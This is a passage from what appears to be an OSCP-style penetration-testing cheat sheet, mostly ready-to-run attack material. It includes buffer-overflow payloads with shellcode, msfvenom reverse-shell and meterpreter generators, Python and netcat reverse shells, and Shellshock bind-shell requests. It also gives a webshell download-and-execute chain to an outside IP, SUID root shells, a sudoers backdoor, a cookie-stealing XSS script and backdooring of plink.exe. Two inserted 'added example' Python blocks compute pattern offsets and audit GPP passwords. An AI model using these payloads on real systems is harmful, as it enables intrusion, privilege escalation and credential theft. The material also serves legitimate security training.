746 | - Use NASM to determine the HEX code for a JMP ESP instruction
747 |
748 | - /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
749 |
750 | - JMP ESP
751 | 00000000 FFE4 jmp esp
752 |
753 | - Run Mona in immunity log window to find (FFE4) XEF command
754 |
755 | - !mona find -s "\xff\xe4" -m slmfc.dll
756 | found at 0x5f4a358f - flip around for little endian format
757 |
758 | - buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
759 |
760 | - MSFVenom to create payload
761 | msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
763 |
764 | - Final payload with NOP slide
765 | buffer = "A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
767 |
768 | - Create a PE reverse shell
769 | msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -o shell_reverse.exe
772 |
773 | - Create a PE reverse shell and encode 9 times with shikata_ga_nai
775 | msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
779 |
780 | - Create a PE reverse shell and embed it into an existing executable
782 | msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
786 |
787 | - Create a PE reverse HTTPS shell
788 | msfvenom -p windows/meterpreter/reverse_https LHOST=$ip LPORT=443 -f exe -o met_https_reverse.exe
786 |
787 | - Create a PE Reverse HTTPS shell
788 | msfvenom -p windows/meterpreter/reverse\_https LHOST=$ip
789 | LPORT=443 -f exe -o met\_https\_reverse.exe
790 |
791 | - Linux Buffer Overflows
792 |
793 | - Run Evans Debugger against an app
794 | edb --run /usr/games/crossfire/bin/crossfire
795 |
796 | - ESP register points toward the end of our CBuffer
797 | add eax,12
798 | jmp eax
799 | 83C00C add eax,byte +0xc
800 | FFE0 jmp eax
801 |
802 | - Check for "Bad Characters" by process of elimination - run multiple times 0x00 - 0xFF
804 |
805 | - Find JMP ESP address
806 | "\x97\x45\x13\x08" # Found at address 08134597
807 |
808 | - crash = "\x41" * 4368 + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"
810 |
811 | - msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
813 |
814 | - Connect to the shell with netcat:
815 | nc -v $ip 4444
816 |
817 | Shells
818 | ===============================================================================================================================
819 |
820 | - Netcat Shell Listener
821 | nc -nlvp 443
822 |
823 | - Spawning a TTY Shell - Break out of Jail or limited shell
824 | You should almost always upgrade your shell after taking control of an apache or www user.
825 | (For example when you see the error `sh: no job control in this shell` while trying to run an exploit.)
826 | (hint: sudo -l to see what you can run)
827 |
828 | - python -c 'import pty; pty.spawn("/bin/sh")'
829 |
830 | - python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
835 |
836 | - echo os.system('/bin/bash')
837 |
838 | - /bin/sh -i
839 |
840 | - perl -e 'exec "/bin/sh";'
841 |
842 | - perl: exec "/bin/sh";
843 |
844 | - ruby: exec "/bin/sh"
845 |
846 | - lua: os.execute('/bin/sh')
847 |
848 | - (From within IRB)
849 | exec "/bin/sh"
850 |
851 | - (From within vi)
852 | :!bash
853 |
854 | - From within vim
855 | Breaking out of vim is done by ':!bash':
856 |
857 | - (From within vi)
858 | :set shell=/bin/bash:shell
859 |
860 | - (From within nmap)
861 | !sh
862 |
863 | - (From within tcpdump)
864 | ```shell
865 | echo -e "id\n/bin/netcat $ip 443 -e /bin/bash" > /tmp/.test
866 | chmod +x /tmp/.test
867 | sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
868 | ```
869 |
870 | - from busybox
871 | /bin/busybox telnetd -l /bin/sh -p 9999
872 |
873 | - Pen test monkey PHP reverse shell
874 | [*http://pentestmonkey.net/tools/web-shells/php-reverse-shell*](http://pentestmonkey.net/tools/web-shells/php-reverse-shell)
875 |
876 | - php-findsock-shell - turns PHP port 80 into an interactive shell
877 | [*http://pentestmonkey.net/tools/web-shells/php-findsock-shell*](http://pentestmonkey.net/tools/web-shells/php-findsock-shell)
878 |
879 | - Perl Reverse Shell
880 | [*http://pentestmonkey.net/tools/web-shells/perl-reverse-shell*](http://pentestmonkey.net/tools/web-shells/perl-reverse-shell)
881 |
882 | - PHP powered web browser Shell b374k with file upload etc.
883 | [*https://github.com/b374k/b374k*](https://github.com/b374k/b374k)
884 |
885 | - Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell
886 | https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
887 |
888 | - Web Backdoors from Fuzzdb
889 | https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors
890 |
891 | - Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/
892 |
893 | *Linux*
894 |
895 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
896 |
897 | *Windows*
898 |
899 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
900 |
901 | *Mac*
902 |
903 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
904 |
905 | **Web Payloads**
906 |
907 | *PHP*
908 |
909 | msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
910 |
911 | cat shell.php | pbcopy && echo '<?php ' > shell.php && pbpaste >> shell.php
912 |
913 | *ASP*
914 |
915 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
916 |
917 | *JSP*
918 |
919 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
920 |
921 | *WAR*
922 |
923 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
924 |
925 | **Scripting Payloads**
926 |
927 | *Python*
928 |
929 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
930 |
931 | *Bash*
932 |
933 | msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
934 |
935 | *Perl*
936 |
937 | msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
938 |
939 | **Shellcode**
940 |
941 | For all shellcode see `msfvenom --help-formats` for information on valid parameters. Msfvenom will output code that can be cut and pasted into your exploits in the chosen language.
942 |
943 | *Linux Based Shellcode*
944 |
945 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
946 |
947 | *Windows Based Shellcode*
948 |
949 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
950 |
951 | *Mac Based Shellcode*
952 |
953 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
954 |
955 | **Handlers**
956 | Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
957 |
958 | use exploit/multi/handler
959 |
960 | set PAYLOAD
961 |
962 | set LHOST
963 |
964 | set LPORT
965 |
966 | set ExitOnSession false
967 |
968 | exploit -j -z
969 |
970 | Once the required values are completed the following command will execute your handler: `msfconsole -L -r`
971 |
972 | - SSH to Meterpreter:
973 |
974 | use auxiliary/scanner/ssh/ssh_login
975 |
976 | use post/multi/manage/shell_to_meterpreter
977 |
978 | https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/
979 |
980 | - Compiling Windows Exploits on Kali
981 |
982 | - wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
984 | wine mingw-get-setup.exe
985 | select mingw32-base
986 |
987 | - cd /root/.wine/drive_c/windows
988 | wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
990 | cd /root/.wine/drive_c/MinGW/bin
991 | wine gcc -o ability.exe /tmp/exploit.c -lwsock32
992 | wine ability.exe
993 |
994 | - Cross Compiling Exploits
995 |
996 | - gcc -m32 -o output32 hello.c (32 bit)
997 | gcc -m64 -o output hello.c (64 bit)
998 |
999 | - Shellshock
1000 |
1001 | - git clone
1002 |
1003 | - ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
1005 |
1006 | - Shell Shock SSH Forced Command
1007 | Check for forced command by enabling all debug output with ssh
1008 | ssh -vvv
1009 | ssh -i noob noob@$ip '() { :;}; /bin/bash'
1010 |
1011 | - cat file (view file contents)
1012 | ```shell
1013 | echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
1014 | ```
1015 |
1016 | - Shell Shock run bind shell
1017 | ```shell
1018 | echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
1019 | ```
1020 |
1021 | - Shell Shock reverse Shell
1022 | nc -l -p 443
1023 |
1024 | - Buffer Overflow Exploits
1025 |
1026 | - Pass 1000 A’s as a parameter
1027 | ./r00t $(python -c 'print "A" \* 1000')
1028 |
1029 | - Random Pattern Create
1030 | /usr/share/metasploit-framework/tools\# ruby pattern\_create.rb 1000
1032 |
1033 | - Determine Pattern offset
1034 | ruby pattern\_offset.rb 0x6a413969
1035 |
1036 | - Pass shell with offset value
1037 | env - ./r00t $(python -c 'print "A"\*268 +
1038 | "\\x80\\xfc\\xff\\xbf" + "\\x90"\*16 +
1039 | "\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80"')
1040 | \# id
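Added example, not from the cheat sheet or from Metasploit: the cyclic-pattern logic behind pattern\_create.rb / pattern\_offset.rb in Python, so the offset 268 used above can be reproduced from the EIP value 0x6a413969 without the Ruby tools.

```python
import struct
from string import ascii_uppercase, ascii_lowercase, digits

# The pattern is every (Upper, lower, digit) triple in order: Aa0 Aa1 ... Aa9 Ab0 ...
# 26 * 26 * 10 triples of 3 bytes each before it would repeat.
MAX_PATTERN = 26 * 26 * 10 * 3   # 20280


def pattern_create(length):
    """Return the Metasploit-style cyclic pattern truncated to `length` bytes."""
    if not 0 < length <= MAX_PATTERN:
        raise ValueError("length must be between 1 and %d" % MAX_PATTERN)
    chunks = []
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]   # not reached because of the bounds check


def pattern_offset(value, length=MAX_PATTERN):
    """Locate the 4 pattern bytes that landed in EIP and return their offset.

    `value` is either the crash address as an int (0x6a413969, which the CPU read
    little-endian, so the bytes in memory were 'i9Aj') or that 4-byte text itself.
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("ascii", errors="replace")
    else:
        needle = value
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError("%r does not occur in the pattern" % needle)
    return idx


if __name__ == "__main__":
    print(pattern_create(1000)[:60] + "...")
    print("offset of 0x6a413969:", pattern_offset(0x6a413969))   # 268, as in the sheet
```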
1041 |
1042 | - From Fuzzing to Zero Day
1043 | https://blog.techorganic.com/2014/05/14/from-fuzzing-to-0-day/
1044 |
1045 | - Nmap Fuzzers:
1046 |
1047 | - NMap Fuzzer List
1048 | [*https://nmap.org/nsedoc/categories/fuzzer.html*](https://nmap.org/nsedoc/categories/fuzzer.html)
1049 |
1050 | - NMap HTTP Form Fuzzer
1051 | nmap --script http-form-fuzzer --script-args
1052 | 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}'
1053 | -p 80 $ip
1054 |
1055 | - Nmap DNS Fuzzer
1056 | nmap --script dns-fuzz --script-args timelimit=2h $ip -d
1057 |
1058 | File Transfers
1059 | ============================================================================================================
1060 |
1061 | - Post exploitation refers to the actions performed by an attacker,
1062 | once some level of control has been gained on his target.
1063 |
1064 | - Simple Local Web Servers
1065 |
1066 | - Run a basic http server, great for serving up shells etc
1067 | python -m SimpleHTTPServer 80
1068 |
1069 | - Run a basic Python3 http server, great for serving up shells
1070 | etc
1071 | python3 -m http.server
1072 |
1073 | - Run a ruby webrick basic http server
1074 | ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
1076 |
1077 | - Run a basic PHP http server
1078 | php -S $ip:80
1079 |
1080 | - Creating a wget VB Script on Windows:
1081 | [*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*](https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt)
1082 |
1083 | - Mounting File Shares
1084 |
1085 | - Mount NFS share to /mnt/nfs
1086 | mount $ip:/vol/share /mnt/nfs
1087 |
1088 | - HTTP Put
1089 | nmap -p80 $ip --script http-put --script-args
1090 | http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php'
1091 |
1092 | - Uploading Files
1093 | -------------------------------------------------------------------------------------------------------------
1094 |
1095 | - SCP
1096 |
1097 | scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2
1098 |
1099 | scp localfile username@$ip:~/Folder/
1100 |
1101 | - Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor
1102 |
1103 | `davtest -move -sendbd auto -url http://$ip`
1104 |
1105 | https://github.com/cldrn/davtest
1106 |
1107 | You can also upload a file using the PUT method with the curl command:
1108 |
1109 | `curl -T 'leetshellz.txt' 'http://$ip'`
1110 |
1111 | And rename it to an executable file using the MOVE method with the curl command:
1112 |
1113 | `curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'`
1114 |
1115 | - Upload shell using limited php shell cmd
1116 | use the webshell to download and execute the meterpreter
1117 | curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O /tmp/evil" http://$ip/files/sh.php
1119 | curl -s --data "cmd=chmod 777 /tmp/evil" http://$ip/files/sh.php
1121 | curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php
1122 |
1123 | - TFTP
1124 | mkdir /tftp
1125 | atftpd --daemon --port 69 /tftp
1126 | cp /usr/share/windows-binaries/nc.exe /tftp/
1127 | EX. FROM WINDOWS HOST:
1128 | C:\\Users\\Offsec>tftp -i $ip get nc.exe
1129 |
1130 | - FTP
1131 | apt-get update && apt-get install pure-ftpd
1132 |
1133 | \#!/bin/bash
1134 | groupadd ftpgroup
1135 | useradd -g ftpgroup -d /dev/null -s /etc ftpuser
1136 | pure-pw useradd offsec -u ftpuser -d /ftphome
1137 | pure-pw mkdb
1138 | cd /etc/pure-ftpd/auth/
1139 | ln -s ../conf/PureDB 60pdb
1140 | mkdir -p /ftphome
1141 | chown -R ftpuser:ftpgroup /ftphome/
1142 |
1143 | /etc/init.d/pure-ftpd restart
1144 |
1145 | - Packing Files
1146 | -------------------------------------------------------------------------------------------------------------
1147 |
1148 | - Ultimate Packer for eXecutables
1149 | upx -9 nc.exe
1150 |
1151 | - exe2bat - Converts EXE to a text file that can be copied and
1152 | pasted
1153 | locate exe2bat
1154 | wine exe2bat.exe nc.exe nc.txt
1155 |
1156 | - Veil - Evasion Framework -
1157 | https://github.com/Veil-Framework/Veil-Evasion
1158 | apt-get -y install git
1159 | git clone https://github.com/Veil-Framework/Veil-Evasion.git
1160 | cd Veil-Evasion/
1161 | cd setup
1162 | ./setup.sh -c
1163 |
1164 | Privilege Escalation
1165 | ==================================================================================================================
1166 |
1167 | - Linux Privilege Escalation
1168 | ------------------------------------------------------------------------------------------------------------------------
1169 |
1170 | - Try the obvious - Maybe the user can sudo to root:
1171 | sudo su
1172 |
1173 | - Highon.coffee Linux Local Enum
1174 | `wget https://highon.coffee/downloads/linux-local-enum.sh`
1175 |
1176 | - Basic Linux Privilege Escalation
1177 | [*https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/*](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
1178 |
1179 | - Linux Privilege Exploit Suggester
1180 | [*https://github.com/PenturaLabs/Linux\_Exploit\_Suggester*](https://github.com/PenturaLabs/Linux_Exploit_Suggester)
1181 |
1182 | - Linux post exploitation enumeration and exploit checking tools
1183 | [*https://github.com/reider-roque/linpostexp*](https://github.com/reider-roque/linpostexp)
1184 |
1185 | - CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
1186 | [*https://www.exploit-db.com/exploits/15285/*](https://www.exploit-db.com/exploits/15285/)
1187 |
1188 | - CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo
1189 | / Ubuntu x86/x64)
1190 | [*https://git.zx2c4.com/CVE-2012-0056/about/*](https://git.zx2c4.com/CVE-2012-0056/about/)
1191 | Linux CVE 2012-0056
1192 | wget -O exploit.c
1193 | gcc -o mempodipper exploit.c
1194 | ./mempodipper
1195 |
1196 | - CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux
1197 | Kernel <= 3.19.0-73.8
1198 | [*https://dirtycow.ninja/*](https://dirtycow.ninja/)
1199 | First existed on 2.6.22 (released in 2007) and was fixed on Oct 18,
1200 | 2016
1201 | ./cow32
1202 | DirtyCow root privilege escalation
1203 | Backing up /usr/bin/passwd.. to /tmp/bak
1204 | Size of binary: 45420
1205 | Racing, this may take a while..
1206 | thread stopped
1207 | thread stopped
1208 | /usr/bin/passwd is overwritten
1209 | Popping root shell.
1210 |
1211 | - Run a command as a user other than root
1212 | sudo -u waldo /usr/bin/vim
1213 | /etc/apache2/sites-available/000-default.conf
1214 |
1215 | - Add a user or change a password
1216 | /usr/sbin/useradd -p "$(openssl passwd -1 thePassword)" haxzor
1217 | echo thePassword | passwd haxzor --stdin
1218 |
1219 | - Local Privilege Escalation Exploit in Linux
1220 |
1221 | - **SUID** (**S**et owner **U**ser **ID** up on execution)
1222 | Often a SUID C binary is needed to spawn a shell as the
1223 | superuser; update the UID / GID and shell as required.
1224 |
1225 | Below are some quick copy and paste examples for various
1226 | shells:
1227 |
1228 | SUID C Shell for /bin/bash
1229 |
     | #define _GNU_SOURCE      /* exposes setresuid() in the glibc headers */
     | #include <stdlib.h>      /* system() */
     | #include <unistd.h>      /* setresuid() */
1230 | int main(void){
1231 |     setresuid(0, 0, 0);  /* real, effective and saved UID all become root */
1232 |     system("/bin/bash");
     |     return 0;
1233 | }
1234 |
1235 | SUID C Shell for /bin/sh
1236 |
     | #define _GNU_SOURCE
     | #include <stdlib.h>
     | #include <unistd.h>
1237 | int main(void){
1238 |     setresuid(0, 0, 0);
1239 |     system("/bin/sh");
     |     return 0;
1240 | }
1241 |
1242 | Building the SUID Shell binary
1243 | gcc -o suid suid.c
1244 | For 32 bit:
1245 | gcc -m32 -o suid suid.c
1246 |
1247 | - Create and compile an SUID from a limited shell (no file
1248 | transfer)
1249 | echo -e "#include <stdlib.h>\\n#include <unistd.h>\\nint main(void){\\nsetgid(0);
1250 | setuid(0);\\nsystem(\\"/bin/sh\\");\\n}" > privsc.c
1251 | gcc privsc.c -o privsc
1252 |
1253 | - Add users to Root SUDO group with no password requirement
1254 | echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:
1255 | ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' >
1256 | /tmp/update
1257 |
1258 | - SearchSploit
1259 | searchsploit -u
     | searchsploit apache 2.2
1260 | searchsploit "Linux Kernel"
1261 | searchsploit linux 2.6 | grep -i ubuntu | grep local
1262 | searchsploit slmail
1263 |
1264 | - Kernel Exploit Suggestions for Kernel Version 3.0.0
1265 | /usr/share/linux-exploit-suggester/Linux\_Exploit\_Suggester.pl -k 3.0.0
1266 |
1267 | - Precompiled Linux Kernel Exploits - ***Super handy if GCC is not installed on the target machine!***
1268 |
1269 | [*https://www.kernel-exploits.com/*](https://www.kernel-exploits.com/)
1270 |
1271 | - Collect root password
1272 | cat /etc/shadow |grep root
1273 |
1274 | - Find and display the proof.txt or flag.txt - LOOT!
1275 | `cat $(find / -name proof.txt -print)`
1276 |
1277 | - Windows Privilege Escalation
1278 | --------------------------------------------------------------------------------------------------------------------------
1279 |
1280 | - Windows Privilege Escalation resource
1281 | http://www.fuzzysecurity.com/tutorials/16.html
1282 |
1283 | - Try the getsystem command using meterpreter - rarely works but is worth a try.
1284 | `meterpreter > getsystem`
1285 |
1286 | - Metasploit Meterpreter Privilege Escalation Guide
1287 | https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
1288 |
1289 | - Windows MS11-080 - http://www.exploit-db.com/exploits/18176/
1290 | python pyinstaller.py --onefile ms11-080.py
1291 | ms11-080.exe -O XP
1292 |
1293 | - Powershell Priv Escalation Tools
1294 | https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
1295 |
1296 | - Windows Service Configuration Viewer - Check for misconfigurations
1297 | in services that can lead to privilege escalation. You can replace
1298 | the executable with your own and have windows execute whatever code
1299 | you want as the privileged user.
1300 | icacls scsiaccess.exe
1301 |
1302 | > scsiaccess.exe
1303 | > NT AUTHORITY\\SYSTEM:(I)(F)
1304 | > BUILTIN\\Administrators:(I)(F)
1305 | > BUILTIN\\Users:(I)(RX)
1306 | > APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)
1307 | > Everyone:(I)(F)
1308 |
1309 | - Compile a custom add user command in windows using C
1310 | root@kali:~\# cat useradd.c
1311 | \#include <stdlib.h> /\* system, NULL, EXIT\_FAILURE \*/
1312 | int main ()
1313 | {
1314 | int i;
1315 | i=system ("net localgroup administrators low /add");
1316 | return 0;
1317 | }
1318 |
1319 | i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
1320 |
1321 | - Group Policy Preferences (GPP)
1322 | A common useful misconfiguration found in modern domain environments
1323 | is unprotected Windows GPP settings files
1324 |
1325 | - map the Domain controller SYSVOL share
1326 | net use z: \\\\dc01\\SYSVOL
1327 |
1328 | - Find the GPP file: Groups.xml
1329 | dir /s Groups.xml
1330 |
1331 | - Review the contents for passwords
1332 | type Groups.xml
1333 |
1334 | - Decrypt using GPP Decrypt
1335 | gpp-decrypt
1336 | riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB
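Added example (not part of the cheat sheet): a Python audit that finds cpassword entries in GPP preference files such as the Groups.xml that gpp-decrypt is pointed at above, so a defender can sweep a mounted SYSVOL copy for policies that still store credentials. The sample XML, its uid GUIDs, the cpassword value and the paths are constructed placeholders.

```python
import os
import xml.etree.ElementTree as ET

# GPP preference files known to carry a cpassword attribute (the MS14-025 set).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Printers.xml", "Drives.xml"}
ACTIONS = {"C": "create", "R": "replace", "U": "update", "D": "delete"}

# Constructed Groups.xml in the layout GPP writes under
# SYSVOL\<domain>\Policies\<GUID>\Machine\Preferences\Groups\.
# The uid GUIDs and the cpassword value are placeholders, not real data.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)"
        image="2" changed="2015-05-06 05:50:40" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="PLACEHOLDER-NOT-A-REAL-CPASSWORD" changeLogon="0" noChange="1"
                neverExpires="1" acctDisabled="0" userName="Administrator (built-in)"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="svc_backup"
        image="1" changed="2015-05-06 05:51:10" uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="C" newName="" fullName="" description="" changeLogon="0"
                noChange="0" neverExpires="0" acctDisabled="0" userName="svc_backup"/>
  </User>
</Groups>"""


def find_gpp_passwords(xml_text):
    """Return one dict per <Properties> element that carries a cpassword attribute."""
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    hits = []
    for props in root.iter("Properties"):
        cp = props.get("cpassword")
        if not cp:
            continue   # entry without a stored password: nothing to report
        # Groups.xml uses userName, Services.xml accountName, ScheduledTasks.xml runAs.
        account = props.get("userName") or props.get("accountName") or props.get("runAs")
        hits.append({"account": account,
                     "action": ACTIONS.get(props.get("action"), props.get("action")),
                     "cpassword": cp})
    return hits


def _basename(path):
    # Handle both z:\...\Groups.xml and /mnt/sysvol/.../Groups.xml on any host OS.
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def audit_files(items):
    """items: iterable of (path, xml_text). Returns {path: hits} for files with findings."""
    findings = {}
    for path, text in items:
        if _basename(path) in GPP_FILES:
            hits = find_gpp_passwords(text)
            if hits:
                findings[path] = hits
    return findings


def audit_sysvol(root_dir):
    """Walk a mounted SYSVOL copy (e.g. the z: mapping above) and audit every GPP file."""
    def read_all():
        for dirpath, _, files in os.walk(root_dir):
            for name in files:
                if name in GPP_FILES:
                    path = os.path.join(dirpath, name)
                    with open(path, "rb") as fh:
                        yield path, fh.read()
    return audit_files(read_all())


if __name__ == "__main__":
    for hit in find_gpp_passwords(SAMPLE_GROUPS_XML):
        print("stored credential for %(account)s (action: %(action)s)" % hit)
```

Any hit means the policy should be removed and the account's password rotated, since the AES key for cpassword is public.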
1337 |
1338 | - Find and display the proof.txt or flag.txt - get the loot!
1339 | `#meterpreter > run post/windows/gather/win_privs`
1340 |
1341 | `cd\ & dir /b /s proof.txt`
1342 | `type c:\pathto\proof.txt`
1343 |
1344 |
1345 | Client, Web and Password Attacks
1346 | ==============================================================================================================================
1347 |
1348 | - Client Attacks
1349 | ------------------------------------------------------------------------------------------------------------
1350 |
1351 | - MS12-037- Internet Explorer 8 Fixed Col Span ID
1352 | wget -O exploit.html
1353 |
1354 | service apache2 start
1355 |
1356 | - JAVA Signed Jar client side attack
1357 | echo '<applet width="1" height="1" id="Java Secure"
1358 | code="Java.class" archive="SignedJava.jar"><param name="1"
1359 | value="http://$ip:80/evil.exe"></applet>' >
1360 | /var/www/html/java.html
1361 | User must hit run on the popup that occurs.
1362 |
1363 | - Linux Client Shells
1364 | [*http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/*](http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/)
1365 |
1366 | - Setting up the Client Side Exploit
1367 |
1368 | - Swapping Out the Shellcode
1369 |
1370 | - Injecting a Backdoor Shell into Plink.exe
1371 | backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip
1372 | -P 4444 -s reverse\_shell\_tcp
1373 |
1374 | - Web Attacks
1375 | ---------------------------------------------------------------------------------------------------------
1376 |
1377 | - Web Shag Web Application Vulnerability Assessment Platform
1378 | webshag-gui
1379 |
1380 | - Web Shells
1381 | [*http://tools.kali.org/maintaining-access/webshells*](http://tools.kali.org/maintaining-access/webshells)
1382 | ls -l /usr/share/webshells/
1383 |
1384 | - Generate a PHP backdoor (generate) protected with the given
1385 | password (s3cr3t)
1386 | weevely generate s3cr3t
1387 | weevely http://$ip/weevely.php s3cr3t
1388 |
1389 | - Java Signed Applet Attack
1390 |
1391 | - HTTP / HTTPS Webserver Enumeration
1392 |
1393 | - OWASP Dirbuster
1394 |
1395 | - nikto -h $ip
1396 |
1397 | - Essential Iceweasel Add-ons
1398 | Cookies Manager
1399 | https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
1400 | Tamper Data
1401 | https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
1402 |
1403 | - Cross Site Scripting (XSS) - can have significant impacts, such as
1404 | cookie stealing and authentication bypass, redirecting the victim’s
1405 | browser to a malicious HTML page, and more
1407 |
1408 | - Browser Redirection and IFRAME Injection
1409 | <iframe SRC="http://$ip/report" height = "0" width
1410 | ="0"></iframe>
1411 |
1412 | - Stealing Cookies and Session Information
1413 | <script>
1414 | new Image().src="http://$ip/bogus.php?output="+document.cookie;
1416 | </script>
1417 | nc -nlvp 80
1418 |
1419 | - File Inclusion Vulnerabilities
1420 | -----------------------------------------------------------------------------------------------------------------------------
1421 |
1422 | - Local (LFI) and remote (RFI) file inclusion vulnerabilities are
1423 | commonly found in poorly written PHP code.
1424 |
1425 | - fimap - There is a Python tool called fimap which can be
1426 | leveraged to automate the exploitation of LFI/RFI
1427 | vulnerabilities that are found in PHP (sqlmap for LFI):
1428 | [*https://github.com/kurobeats/fimap*](https://github.com/kurobeats/fimap)
1429 |
1430 | - Gaining a shell from phpinfo()
1431 | fimap + phpinfo() Exploit - If a phpinfo() file is present,
1432 | it’s usually possible to get a shell, if you don’t know the
1433 | location of the phpinfo file fimap can probe for it, or you
1434 | could use a tool like OWASP DirBuster.
1435 |
1436 | - For Local File Inclusions look for the include() function in PHP
1437 | code.
1438 | include("lang/".$\_COOKIE\['lang'\]);
1439 | include($\_GET\['page'\].".php");
1440 |
1441 | - LFI - Encode and Decode a file using base64
1442 | curl -s
1443 | http://$ip/?page=php://filter/convert.base64-encode/resource=index
1444 | | grep -e '\[^\\ \]\\{40,\\}' | base64 -d
1445 |
